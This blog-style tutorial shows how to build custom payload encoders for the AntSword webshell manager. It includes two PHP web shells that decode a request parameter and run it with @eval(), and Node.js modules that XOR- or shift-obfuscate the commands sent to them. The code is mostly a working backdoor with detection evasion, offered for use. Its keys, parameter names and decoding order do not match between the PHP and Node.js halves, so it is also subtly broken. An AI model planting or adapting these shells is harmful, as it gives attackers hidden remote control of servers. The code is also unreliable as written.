Custom Encoder Implementation for AntSword

Implementing custom encoders in AntSword requires separating encryption and decryption logic across two layers. This approach enhances security by using parameterized payload transmission. The core syntax follows:

/**
 * @param {String} pwd Connection password
 * @param {Array} data Payload array before processing
 * @return {Array} Processed payload array
 */

// data['_'] contains original payload
// data[pwd] stores connection parameters
// data['key'] holds custom parameters
delete data['_']; // Remove original payload

XOR Encrytpion Implementation

PHP decryption handler:

<?php
function xorCipher($input, $secret) {
    $secretLength = strlen($secret);
    $output = '';
    
    for ($i = 0; $i < strlen($input); $i++) {
        $secretChar = $secret[$i % $secretLength];
        $output .= chr(ord($input[$i]) ^ ord($secretChar));
    }
    return $output;
}

$paramA = $_REQUEST["a"];
$secretKey = "static_key";
$decrypted = xorCipher(base64_decode($paramA), $secretKey);
@eval($decrypted);

Node.js encoder for AntSword:

module.exports = (pwd, data) => {
  function xorCipher(input, secret) {
    const secretStr = secret.toString();
    let output = '';
    for (let i = 0; i < input.length; i++) {
      const secretCode = secretStr.charCodeAt(i % secretStr.length);
      const charCode = input.charCodeAt(i);
      output += String.fromCharCode(charCode ^ secretCode);
    }
    return output;
  }

  const secret = 123456789;
  data['_'] = Buffer.from(data['_']).toString('base64');
  data[pwd] = xorCipher(data['_'], secret);
  delete data['_'];
  return data;
}

Shift Transformation Implementtaion

PHP decryption handler:

<?php
function shiftDecrypt($input, $offset) {
    $output = '';
    for ($i = 0; $i < strlen($input); $i++) {
        $output .= chr((ord($input[$i]) - $offset + 256) % 256);
    }
    return $output;
}

$paramA = $_REQUEST["a"];
$offset = $_REQUEST["key"];
$decrypted = shiftDecrypt(base64_decode($paramA), $offset);
@eval($decrypted);

Dynamic key encoder:

module.exports = (pwd, data) => {
  function shiftTransform(input, offset) {
    let output = '';
    for (let i = 0; i < input.length; i++) {
      const code = input.charCodeAt(i);
      output += String.fromCharCode((code + offset) % 256);
    }
    return output;
  }

  const randomOffset = Math.floor(Math.random() * 6) + 5;
  data['_'] = Buffer.from(data['_']).toString('base64');
  data['key'] = randomOffset;
  data[pwd] = shiftTransform(data['_'], randomOffset);
  delete data['_'];
  return data;
}

Parameters can be transmitted via $_REQUEST, cookies, or sessions. Alternative encryption methods can be implemented following the same pattern.

Tags: AntSword webshell PHP Node.js XOR

Posted on Mon, 22 Jun 2026 18:25:37 +0000 by StefanRSA

Hot Tags

©2026 Freaks City